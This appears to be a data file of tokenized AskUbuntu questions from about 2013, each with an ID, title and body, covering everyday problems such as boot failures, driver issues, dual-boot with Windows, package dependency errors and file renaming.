384512	can not move file to subdirectory of itself	i 'm having a little problem with renaming a bunch of files in a folder . the script : for file in $ 1 do mv $ file $ file | sed -r 's/^ . { 20 } // ' | sed 's/.\ { 16\ } $ //' done the output : mv : can not move `/home/timothy/videos/db/ ' to a subdirectory of itself , `/home/timothy/videos/db/db' the sed command is correct , it 's just that i 'm doing something wrong with the mv parameters . these are the names of the first 5 files : [ a-s ] _dragon_ball_-_001_-_the_secret_of_the_dragon_balls__rs2_ [ 4fc1375c ] [ a-s ] _dragon_ball_-_002_-_the_emperors_quest__rs2_ [ 59f9c743 ] [ a-s ] _dragon_ball_-_003_-_the_nimbus_cloud_of_roshi__rs2_ [ 0c592f5f ] [ a-s ] _dragon_ball_-_004_-_oolong_the_terrible__rs2_ [ 47ce4923 ] [ a-s ] _dragon_ball_-_005_-_yamcha_the_desert_bandit__rs2_ [ b6a035bf ] and it should become this : 001_-_the_secret_of_the_dragon_balls 002_-_the_emperors_quest 003_-_the_nimbus_cloud_of_roshi 004_-_oolong_the_terrible 005_-_yamcha_the_desert_bandit
384513	how to create transparent logo	how am i suppose to create a logo with a transparent background using gimp in ubuntu studio 13.10 . i have tried making one several times but to no avail a white background is still always there .
384514	how to set the umask in 13.10 ?	apparently , there 's a bug in upstart that 's shipped with ubuntu 13.10 , which overrides the umask set either through $ home/.profile or /etc/login.defs . upstart has been updated to fix this in trusty , but how do i go about it in ubuntu 13.10 ? the bug report mentions creating an upstart override job in $ home/.config/upstart for whatever session you happen to be running . how would one do this ? the report also mentioning disabling upstart for the user session , which would be the way things worked pre-13.10 if i 've understand things correctly . but are there any side effects to this ? how can i find out if the updated upstart will find its way to 13.10 ?
384516	problem opening xboard	i recently installed xboard but when i type xboard in the terminal it is not opening instead gives me the following error : dineshkumar @ dineshkumar-desktop : ~ $ xboard load checkmark.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/checkmark.bm ... using built-in load icon_white.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/icon_white.bm ... using built-in load icon_black.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/icon_black.bm ... using built-in load p64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/p64s.bm ... using built-in load n64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/n64s.bm ... using built-in load b64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/b64s.bm ... using built-in load r64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/r64s.bm ... using built-in load q64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/q64s.bm ... using built-in load f64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/f64s.bm ... using built-in load e64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/e64s.bm ... using built-in load a64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/a64s.bm ... using built-in load c64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/c64s.bm ... using built-in load w64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/w64s.bm ... using built-in load m64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/m64s.bm ... using built-in load o64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/o64s.bm ... using built-in load h64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/h64s.bm ... using built-in load i64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/i64s.bm ... using built-in load j64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/j64s.bm ... using built-in load g64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/g64s.bm ... using built-in load d64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/d64s.bm ... using built-in load v64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/v64s.bm ... using built-in load l64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/l64s.bm ... using built-in load s64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/s64s.bm ... using built-in load u64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/u64s.bm ... using built-in load k64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/k64s.bm ... using built-in load wp64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/wp64s.bm ... using built-in load wn64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/wn64s.bm ... using built-in load ws64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/ws64s.bm ... using built-in load wl64s.bm xboard : ca n't open bitmap file ./usr/share/games/xboard/bitmaps/default/wl64s.bm ... using built-in x error of failed request : baddrawable ( invalid pixmap or window parameter ) major opcode of failed request : 63 ( x_copyplane ) resource id in failed request : 0x0 serial number of failed request : 186 current serial number in output stream : 263 i guess that the problem is due to the bitmap files . they are named with a wrong .bm extension instead of .bmp extension in the location ./usr/share/games/xboard/bitmaps/default/ . i tried to rename them but i could n't ( the rename option in right-click pop-up menu is n't working ) . i have the original bitmap files and i tried to copy them and paste in the above location but that too was n't possible . how do i sort this out ?
384517	problem in installing glut on ubuntu	i try to install glut in my compaq laptop using apt-get install libglut3-dev , but it is showing , e : unable to locate package freeglut3-dev.. what is the method to overcome from this problem please help me !
384518	ubuntu 12.04 boots to black screen . thinkpad edge e330	i 'm really proud of my new thinkpad edge e 330 and for the first time i chose ubuntu to be my new os . i 'm really pleased with that os except for one bug i have . here is the problem : ubuntu often boots to a black screen . not entirely black ... i can see the mouse and it responds to the movements and i can see the cursor , but the cursor does n't respond when i type something in . so all in all i can do nothing . that bug is really anoying , because i do n't know what to do and just turn the laptop off and on und hope that ubuntu starts as it should do . does anyone know how to solve that problem , or how to log in when there is just that black screen with the cursor and the mouse ? i already showed that bug someone and he pressed some keykombination and the terminal apeared so he could type something in in order to start ubunto from the terminal . but i do n't know the combination . thanks for your help
384520	can no longer boot into ubuntu 12.04 lts after failed 13.04 update	yesterday i was trying to update ubuntu 12.04 ( 64bit version dual-booted with win 8.1 64bit ) to 13.04 , and something happened that has now caused me to not be able to boot into ubuntu at all . only windows works now . went into the update manager had selected the option to have it inform me of all updates including non-lts versions , and that finally got it to work ... ..or at least it looked as if it was going to work , but it failed ( this being the 2nd time it did that , tried updating via command line at first before trying it this way ) i have no idea what happened tho . it was going fine , and i got up to get something to drink , prolly took like 5min , came back , and my laptop was off , and now it wo n't boot in ubuntu . tried going into recovery and having it check the filesystem , and `` repair broken packages '' to no avail . they both finish , then once it tries to boot into ubuntu , i just get a black screen and it stays like that until i hard-reset . i 've been trying to figure this out since yesterday morning , and am about to just delete it and start fresh , luckily everything was already backed-up , but figured i would ask here and see if anyone had any other ideas before i wipe it and start over .
384521	knetwork manager does n't appear in task manager after upgrade	i have recently upgraded my system to kubuntu 13 ( the latest one ) and knetwork manager does n't work anymore ... it is still connecting to my network but it does n't appear in the task manger anymore so i ca n't connect to any new networks.. please help .
384523	will gdisk zap erase my disk ?	my ubuntu install is not detecting my windows 7 . some say i need to convert it from mbr to gpt or the other way around . so when i try to zap my drive with gdisk through the terminal , it gives me a warning that it might be destructive or something . these are the commands i use : sudo gdisk /dev/sda z what should i do ? could this erase everything i have on the disk ? edit : so when i type sudo gdisk /dev/sdc it comes up with a warning that says that i have no gpt partition table , and converting mbr to gpt is `` potentially destructive '' . then it asks if i want to continue . so is it destructive ? what does this even mean ?
384524	each time i install nvidia drivers in a alienware x51 , the system boots to a black screen	whenever i install the nvidia drivers on an alienware x51 , which ever method i follow the machine boots to a black screen , ctrl + alt + f1 etc are also totally blank so i ca n't remove what i 've installed .
384526	security and ubuntu	i have used linux before ( ubuntu 13.04 ) , but i have moved back to windows after having compatibility issues with windows programs ex . autocad and proengineer wildfire . however , i tried using linux again , but is it true that my system is secure without an internet security application ( or an antivirus application ) . i have read on many forums that linux is completely secure but that feeling of being vulnerable to viruses without an internet security suite bothers me . does anybody have any information on this , i would like to use linux . also is it safe for online transactions ?
384527	how to restore windows 8 after debian then ubuntu installs	i have lost the ability to boot into windows 8 on my new computer . here is the sequence of events that led to this : i installed the newest version of debian by resizing the main partition and creating two new partitions ( for / and /home ) . debian could not launch x-windows because the graphics card was too new . however , the grub boot menu had an option for windows and i could boot into windows 8 after installing debian . in order to get x-windows support , i installed ubuntu 12.04.3 on top of debian , using the same partitions . the computer now boots automatically into ubuntu with no option for windows 8 . i would like to be able to dual boot into ubuntu and windows 8 . the partitions for windows are all still there , including the efi system partition , which still has a directory for microsoft . i apologize if this has been asked before . i found many questions about restoring windows 8 , but none seemed to match exactly my predicament .
384528	black screen while installing on my laptop screen but able to see by using my hdmi connecting to other lcd monitor	screen getting black while installing ubuntu in uefi mode with secure boot disable . i have tried it with a different lcd monitor of samsung made by connecting it with using hdmi cable there i can see whats going on with in the black screen . i install the ubuntu using different monitor successfully , but unable to see in laptops monitors . help
384530	window topbar title positioning	i installed numix gtk theme and everything is fine , but one thing that catches my eye : title is not centered , because of close/minimize buttons , i guess . how can i adjust it ? i did n't find any similar rule in .css . thank you .
384532	how to restore windows boot option in grub2	i used to have two harddrives sda ( ubuntu 12.04lts ) and sdb ( window 7 ) . i used grub2 to boot between both of them . then , i did a clean install of ubuntu 13.10 on sda replacing the old ubuntu version . i think , this install automatically changed boot to uefi if i 'm not mistaken . now , the windows boot option does n't show up anymore in grub menu and i have no way to boot into my windows 7 installation anymore , which i need to do occassionally . how can i restore it ? do i need to revert back to a previous boot mechanism prior uefi ( which one ? ) ? what would be of interest to debug this ? sdb1 is the boot partition of windows 7 ( ntfs ) my linux partitions are encrypted .
384535	kutil in a script	kutil need input multiple line parameters in order to generate a keytab file look at here . can i make it just one line of command or can i put it into a script ? and how ?
384536	evince 3.10 toolbar hides with no obvious way to restore it on lubuntu	i just installed lubuntu 13.10 , replacing lubuntu 13.04 . i have my /home directory on a separate partition , so all my files and settings etc . are right where they are . this also meant i now have evince 3.10 . on lubuntu 13.04 , i think i had evince 3.8 ( not sure ) , but it had a menubar and a toolbar . i 've hidden the toolbar , but the menubar was still available . now , when i open a pdf , i see neither the toolbar nor the menubar . i learnt that the menubar has been removed in favor of a more powerful toolbar in evince 3.10 , but could n't find anything on the net as to why my toolbar is hidden . then , i noticed that if i go fullscreen with f11 and back with esc , the toolbar shows up . but again disappears as soon as i click on the pdf page . so , i thought i 'd try and clear all the evince settings , but i could n't find much . there is no ~/.config/evince . the only thing that i found seems to be related to this problem is ~/.local/share/gvfs-metadata . if i clear out that folder , and open a pdf , the toolbar shows up correctly and behaves right . until i close it and open it again that is . if evince saves a file called home in that directory , then the next time i open the pdf , the toolbar is gone . if i clear the folder again , the toolbar appears . i 'm not sure if all this is intentional , but if that is the case , all i want is how do i summon the toolbar when its hidden , when i need to check the page number i 'm in , for example . thank you for any help with this .
384537	games on ubuntu 12.04 lts 64 bit slow	i have an acer aspire x1301 with factory settings ; it has an ati radeon hd 4350 . my computer has ubuntu 12.04 lts precise pangolin and windows 7 home premium , both 64 bit . i only use windows for games , because i find ubuntu extremely slow with them , even with simple ones . how can i improve that ? i do n't find any drivers on the `` additional drivers '' window . it just says `` no proprietary drivers are in use on this system '' .
384538	recover archive manager 's `` lost '' columns ?	opening an archive , i double-clicked on the `` name '' column to expand it since the file names were long , but that made the column disappear . i tried right clicking and looked for any options and searched the web but i ca n't seem to be able to find a way to recover the disappeared column . closing the application as well as restarting does n't affect this . note , i have indicator-appmenu uninstalled . could it be that the archive manager is supposed to have a menu that i 'm not able to see because of this ? ( i see the menu on every other application ) . this is how the archive manager looks like right now : the `` properties '' field refers to the properties of the archive , not the archive manager .
384539	how can i get back dodge maximized windows function for launcher in 13.10 ?	i still ca n't understand why the developers completely removed the function to let the launcher dodge only maximized windows but is there a way to get this function back by tweaking dconf or so ? this question is explicit to 13.10 where none of the patches or hacks work !
384540	internet traffic monitor	can someone recommend me what is the best ubuntu internet traffic monitor , with preferably gui . i also need it to be able to monitor individual applications to find bandwith leechers . thanks .
384546	lubuntu 13.10 minimal install shows no desktop	i installed the `` lubuntu minimal desktop '' via the 13.10 mini.iso cd image . that means , i should get the basic lubuntu desktop without all the programs . after the installation is finished the system reboots and i am presented with the ( graphical , not command line ) login screen . however , after i enter the password and hit enter , nothing happens . the login box disappears , the wallpaper stays the same , and i get no desktop . i can still move the mouse around and use ctrl+f1 to log into the console . i tried both the 32 bit and 64 bit cd images , as well as installing them on real hardware and in a vm . every time with the same result . i followed this guide . is the `` lubuntu minimal desktop '' option broken ?
384547	unable to open the apperance options to change backgorund image !	i am using ubuntu 13.10 . i try to change my background image however , i can not open the option window from settings menu , even by right click on desktop . if i try to open it from desktop it directs me to the global setting menu . i can only change the image via clicking on a image and commanding as being background image . how do you think i can grasp the appearance settings again ?
384549	will ubuntu work on msi ge40 ?	i am going to buy a new laptop and i am thinking about msi ge40 2ol-276 because of it 's power and relatively low weight . but at the same time i am going to use it with ubuntu . there are not too many posts about there `` interaction '' on google , just a few with installation problems ( uefi-related ) or optimus , but they seem to be solvable . so , the question is : does anyone have any experience or knowledge about using ubuntu ( or at least any linux ) on this laptop ? if yes , what to expect of it ? ps asked the same question on superuser , but no replies there ...
384551	mac os x terminal clone for ubuntu	i would like to set the max os x terminal theme for ubuntu terminal . i really like the fonts and the colors . this is how the mac terminal does look : image source there are few things that i want to see in the ubuntu terminal : i want to replace username @ desktop : ~/dropbox $ with the username and the computer name in this format : desktop : dropbox username $ i want to change the terminal font to look like in the mac terminal . i want to change the color scheme to be like the mac terminal color scheme . is this possible ? how ? note that i do n't want to change the ubuntu theme . i use unity with default theme , but i want to change only the terminal settings because it 's the most used application by me .
384552	will there be an integration of nemo or marlin as ubuntu standard filemanager ?	as the gnome developers decided to make nautilus unusable and unuseful , are there plans to integrate a new file manager or a fork into ubuntu as the standard filemanager ? i would love to see marlin to be perfectly integrated because it has `` miller-columns '' and many other useful functions as well as all the functions that are actually missing in nautilus .
384554	lubuntu 13.10 installer does not detect windows 7 or any partitions & black screen during install	i know this question has been asked numerous times and has been answered ; http : //ubuntuforums.org/showthread.php ? t=1604074 & page=4 & p=10022223 # post10022223 why does n't ubuntu 12.04 recognize my windows 7 partition ? ( these are just a couple of the articles/threads i have read ) however none of the solutions provided seem to solve my problem . i have a samsung ativ book 9 lite with a 128gb ssd with windows 7 64-bit installed . i created an unformatted partition where i intended to install lubuntu to . i then created a usb boot disk using unetbootin , now when i boot to this and hit 'install lubuntu ' the lubuntu splash screen appears and then the screen simply goes blank . i got round this by changing the settings to 'nomodeset ' which then take me to the standard lubuntu install/setup . however the installer does not detect my windows 7 os or the partition i created and sees the ssd as just one partition . i have tried clearing any raid data - i have read that this can cause issues , and tried using sgdisk/gdisk to 'zap ' the partition however the installer still can not see windows 7 or the partition . the strange thing is i used the exact same usb to install to my pc which had no problem with a black screen or detecting my windows 7 installation . the only difference being that i have multiple hdd so installed lubuntu to a hdd of its own ( no partition nonsense - except for the swap area ) . any help you guys can give me would be appreciated as i am out of ideas . thanks qp
384556	how to create an access point with ubuntu 12.04	is there a way i can configure my notebook as an access point for the desktop pc , my tablet and phone over an internet connection i 'm sharing with my neighbor which only connects from the balcony of my house ?
384562	how do i get an iball 3.5g modem working on ubuntu ?	i purchased iball 3.5g connect wireless modem 1 month before . i am trying to connect it with my laptop which is having ubuntu operating system . after plug-in it to the ubuntu system it is not connecting with net . this modem is plug and play but after plugging it nothing is displaying to the system . i am expecting step-by-step method to connect this modem with my ubuntu 12.04 lts sysetm from your expert 's advice .
384565	magnifier wo n't set up using compizconfigsettingsmanager	setting the magnifier to follow a left click does not work or however i set it on the top or side screen it worked in ubuntu but not mythbuntu . if i disable or enable initiate it 's the same . please note my days of dos commands are way in the past . i recently downloaded the latest mythbuntu so i am guessing at the tag i ca n't find a place to look for the version .
384569	problem in downloading vlc	i am new to ubuntu 12.04 i am facing a lot of problem while installing vlc in my laptop every time i try to install it i get an error that the packages are broken . i have tried repairing , cleaning and removing the packages and also reinstalling it but all in vain . i tried installing all packages manually but the same problem occured sudo apt-get install vlc vlc-nox i tried installing vlc using soft ware center but it showed the following error this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.8-0ubuntu0.12.04.1 ) but 2.0.8-0ubuntu0.12.04.1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.9ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.9ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.5 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2.1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.4 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.4 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : libtar0 but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed vlc nox shows following error the following packages have unmet dependencies : vlc-nox : depends : liba52-0.7.4 but it is not going to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.9ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.9ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.9ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.17-93ubuntu4 is to be installed depends : libcddb2 but it is not going to be installed depends : libdvbpsi7 ( > = 0.2.0 ) but it is not going to be installed depends : libebml3 but it is not going to be installed depends : libfontconfig1 ( > = 2.8.0 ) but 2.10.93-0ubuntu1 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.12-0ubuntu1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.8.1-10ubuntu8 is to be installed depends : libgnutls26 ( > = 2.12.6.1-0 ) but 2.12.23-1ubuntu4 is to be installed depends : libmatroska5 but it is not going to be installed depends : libmpcdec6 ( > = 1:0.1~r435 ) but 2:0.1~r459-1ubuntu1 is to be installed depends : libmpeg2-4 but it is not going to be installed depends : libncursesw5 ( > = 5.6+20070908 ) but 5.9+20130608-1ubuntu1 is to be installed depends : libpostproc-extra-52 ( > = 4:0.8-1~ ) but 4:0.8.9ubuntu0.12.04.1 is to be installed depends : libresid-builder0c2a but it is not going to be installed depends : libsidplay2 but it is not going to be installed depends : libsmbclient ( > = 3.0.24 ) but 2:3.6.18-1ubuntu3 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.8.1-10ubuntu8 is to be installed depends : libswscale-extra-2 ( > = 4:0.8-1~ ) but 4:0.8.9ubuntu0.12.04.1 is to be installed depends : libtwolame0 but it is not going to be installed depends : libudev0 ( > = 147 ) but 175-0ubuntu9.4 is to be installed depends : libvcdinfo0 ( > 0.7.23 ) but it is not going to be installed depends : libx264-120 but it is not going to be installed depends : libxml2 ( > = 2.7.4 ) but 2.9.1+dfsg1-3ubuntu2 is to be installed depends : zlib1g ( > = 1:1.2.0.2 ) but 1:1.2.8.dfsg-1ubuntu1 is to be installed @ avinash i tried the first command and got this e : some index files failed to download . they have been ignored , or old ones used instead . w : failed to fetch http : //ppa.launchpad.net/lucid-bleed/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages hash sum mismatch
384570	does ubuntu 13.10 still encounter issues with uefi and windows 8 ?	it is time for a laptop upgrade , i am going to buy a sub âł300 laptop that comes with windows 8 pre-installed . i then plan to either wipe it clean and install the new ubuntu 13.10 or dual boot it with windows 8 . does uefi/secure boot/fast boot ( faststartup ) still present an issue to ubuntu 13.10 users ? i have heard lots of problems when windows 8 cam out about secureboot causing issues , just wondered whether this issue has now been ironed out or resolved yet .
384571	unable to install chrome : libxss1 not statifiable	os : ubuntu 13.10 dual booting windows 8.1 ( both 64 bit ) so i have downloaded chrome from the chrome download website , and when i double click to open it , it opens up software center , and it says dependencies not satisfiable : libxss1 . i do n't know what to do , i am pretty much a linux newbie , since i just managed to get it to dual-boot today . any help ?
384574	how to uninstall summon-arm-toolchain ?	recently i 've cloned and installed summon-arm-toolchain from the git repository summon-arm-toolchain . after reading readme file and do a little try outs with this toolchain i 've seen that installed arm-none-eabi-gdb debugger does n't work so good , and i 've found that it might be a problem with the toolchain , solution of this problem will be installing new toolchain which is still supported gcc-arm-embedded . my question right now is how can i uninstall obsolete toolchain ? should i only remove all executable file which were installed in the /usr/bin folder ? the script itself does n't support uninstall option . how would manage coexistence of those two toolchains which got the same targets ?
384576	i am using ubuntu 12.04 and i have a problem with updating	fetched 1 b in 34s ( 0 b/s ) w : failed to fetch bzip2 : /var/lib/apt/lists/partial/ubuntu.qualitynet.net_ubuntu_dists_precise-backports_universe_source_sources hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . anurag @ hanuman : ~ $ sudo apt-get dist-upgrade
384579	windows 7 computer will not boot from ubuntu usb stick	my computer will not boot from an ubuntu usb stick ( 12.04.3 64-bit ) . it goes straight from the motherboard splash screen to windows 7 's `` starting windows '' screen . then to windows 7 . i 've tried seemingly everything . tweaking nearly every setting in the bios ( boot order , usb-related-anything ) . holding f8 , f11 or f12 while booting . trying different usb ports . unplugging all other usb devices . even attempting it with a second usb drive . i 've read all of the articles and forum posts online . nothing is working . i did n't have this problem before . it was on this machine that i first replaced windows with ubuntu . and without any substantial hurdles . now , i 'm on a fresh install of windows 7 ( work-related ) . it is on its own partition -- 250 gb of 500 gb . i left the remaining 250 gb unallocated , so that i could install ubuntu there . one thought i originally had was to buy a second hard drive ( 500 gb ) on which to install windows . except as it is , i do n't even know how i 'll be able to format the existing one for ubuntu use , without being able to boot from a usb stick . and , when i open wubi , i notice that it can only install ubuntu on a partition of my windows partition . not what i 'm looking to do . my motherboard is an asus m4a78lt-m le ( http : //www.asus.com/motherboards/m4a78ltm_le/ ) . however , i do n't see how it could be the culprit , considering i previously installed ubuntu on it successfully . it seems like it 's something windows 7-related . is there a certain key that can be held down that will make a motherboard force-boot from a usb drive ? any other help ? what can i do ? thank you .
384587	how to support exe files in ubuntu and how to download wine	please help me so that i can use all windows applications and softwares so i could daily use ubuntu.i need microsoft office 13 , photoshop cs6 , nero 10 and other all softwares to support in my ubuntu software please help to make the ubuntu os which is installed in my pc to support exe files .
384588	how do i launch xbmc with green button on mce remote ?	at present by default in ubuntu 12.04 it launches rythmnbox . how do i change this to xbmc ?
384590	installing ubuntu ends in a black screen in msi ge60	when i choose install ubuntu i see black screen of nothingness . and i have disabled secure boot and fast boot . any other option is also ends with black screen . there is possiblity that uefi msi implemntation is preventing me from install ubuntu https : //forum-en.msi.com/index.php ? topic=169082.0 i have 765m gtx maybe this will help you . the only linux distribution i can install without black screen is arch . but it is hard to install for me and second . i need to later transform arch to ubuntu .
384591	lost 5gb of free space after using bleachbit	i 've been using bleachbit to clean up free space on my laptops hdd , and also on my encrypted portable hdd . and i 've got same problem on both devices . bleachbit was running very long , i left it overnight , but in the morning i decided to kill process . after that i deleted all files and directories created by bleachbit ( as root ) . but still got some space mysteriuosly `` lost '' in ubuntu when i open disk properties , this space is marked `` dark grey '' color on the pie diagram . blue stands for used , white stands for free space . and wtf is this dark grey ? and how can i regain it ? any thoughts ? see attached image . and thanks for help in advance .
384592	windows 8.1 upgrade destroyed my ubuntu machine	i had win 8 and ubuntu 12.04 peacefully coexisting on a toshiba portege z935 . efi mode , grub2 , secure boot off , had to use `` recommended repair '' on boot-repair tool to get the boot working after original ubuntu install . all happy for about 10 months until ... . i foolishly accepted ms 's suggestion to update windows to 8.1 . after the upgrade , each boot brought me to a `` grub rescue > '' prompt . was able to do a lengthy workaround to get back to grub menu on each boot , but wanted it fixed . so , i started messing around with boot-repair , repeatedly , until the box would n't boot at all ( just get blacks screen with `` insert disk with command files '' or some such ) . tried reinstalling win 8 , upgrade to 8.1 , then reinstalling ubuntu . same result - would n't boot at all . tried reinstalling 8 without upgrade to 8.1 , same result . tried installing just ubuntu . same result . finally , set box from uefi to csm , installed ubuntu again . now it boots ! so , i 'm guessing the uefi is somehow hosed in the `` firmware '' by one or more of the actions above . how to fix ? i 'm out of ideas , and i want efi back . thanks ! ! !
384593	how do i recursively zip all subfolders in a directory ?	currently , i have this directory structure : /downloads /download 1/ /download 2/ /download 3/ ... i would like to have this directory structure : /downloads download 1.zip download 2.zip download 3.zip ... essentially , i want to zip download 1 into download 1.zip and then remove download 1 . what would be the fastest/easiest way to achieve this ? i 'm running ubuntu 12.04 . the reason i 'm asking is because this folder is shared on my local network . when people ask this on my apache web server , i want them to download download 1 , so i need it to be a zip file .
384594	ubuntu side installation onto w8 notepad ( ssd fast boot )	i 'm evaluating to buy a notebook with w8 ( fast boot with 32 gb ssd memory ) but i want to install also ubuntu 12 . the computer is supplyied with a hdd 320 gb 5400 rpm with only one partition . i was speaking how to install ubuntu but nobody in the store was able to tell me how to . one assistant told me that w8 is residend in the fast ssd boot memory and is not possible to modify the boot manager to decide which os is desiderd when the computer is switched on . can you clarify this to me ?
384596	ca n't mount external hdd	well , i 'm pretty sure this has been asked lots and lots of times , i even looked at some previous questions but i could n't do much with them , so i 'm asking once more . i have an wd external hdd , running ubuntu 12.04 . starting yesterday the drive would n't auto-mount anymore and when i tried navigating to it i got this error message error mounting : mount exited with exit code 13 : ntfs_attr_pread_i : ntfs_pread failed : > input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . now , i 'm not sure if the drive is formatted using ntfs . anyway , i followed the suggestion , booted into windows and tried running chkdsk /f , but windows could n't read the drive either , i got data error ( cyclic redundancy check ) . so i googled that and all the results point to my hdd failing . great ! some of the threads i found also contained the results of running fdisk , so here it is : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe0000000 device boot start end blocks id system /dev/sda1 63 144584 72261 de dell utility /dev/sda2 145408 21116927 10485760 7 hpfs/ntfs/exfat /dev/sda3 * 21116928 155336695 67109884 7 hpfs/ntfs/exfat /dev/sda4 155336702 488394751 166529025 f w95 ext 'd ( lba ) /dev/sda5 483153920 488394751 2620416 dd unknown /dev/sda6 289554432 483151871 96798720 7 hpfs/ntfs/exfat /dev/sda7 155336704 283283455 63973376 83 linux /dev/sda8 283285504 289540095 3127296 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 1499.6 gb , 1499598946304 bytes 255 heads , 63 sectors/track , 182315 cylinders , total 2928904192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000389f4 device boot start end blocks id system /dev/sdb1 2048 2928904191 1464451072 7 hpfs/ntfs/exfat one thread i read suggested using gsmartcontrol to read smart data , but i could n't get anything out of it . i 'm really considering sending it some professional company if i ca n't get it back to working state or ca n't recover the data by myself , but i want to try first . any suggestions ?
384600	files with extantion .mov do n't appear in my files list	files with extantion .mov do n't appear in my files list in the folder i share , while i can see them properly in my folder .
384602	ubuntu hyper-v guest display resolution	good afternoon , i am trying to set up an ubuntu guest on a hyper-v server . i am relatively new to linux so please bear with me , the vm is a test machine to get the hang of things and give ubuntu a try . one of the new features of server 2012 r2 is the improved display capabilities as mentioned here at blogs.technet.com i do n't think i am alone in finding this does n't `` just work '' . some advice found online suggests updating the kernel , which i have done to 3.11.6 as described in one post , and to the latest 3.12.1 . in both cases i could only see resolutions listed under the display options up to 1152x864 , which is what linux has always been limited to under hyper-v. another clue was found in the next link ( in japanese ) - the poster has added `` video=hyperv_fb:1920x1080 '' to /boot/grub2/grub.cfg . when i went to repeat this i noted the message about not editing /boot/grub2/grub.cfg directly so i have added the line in /etc/default/grub instead . yamanxworld.blogspot.co.uk this has not given the option for the full 1920x1080 resolution either , and at this point i have run out of things to try and would not know if this is now a hyper-v issue or something more fundamental and this would not have worked on a physical or other hypervisor machine . if anyone can shed some light i would be most grateful .
384603	how to uninstall comodo antivirus in ubuntu 12.04 64-bit ?	i want to remove virus from my pc . therefore i install comodo anti virus in my ubuntu desktop . now , when the virus is removed , i want to uninstall the antivirus . i have used this command line in terminal ( sudo apt-get purge cav-linux ) but it is showing error . how to fix this , please ?
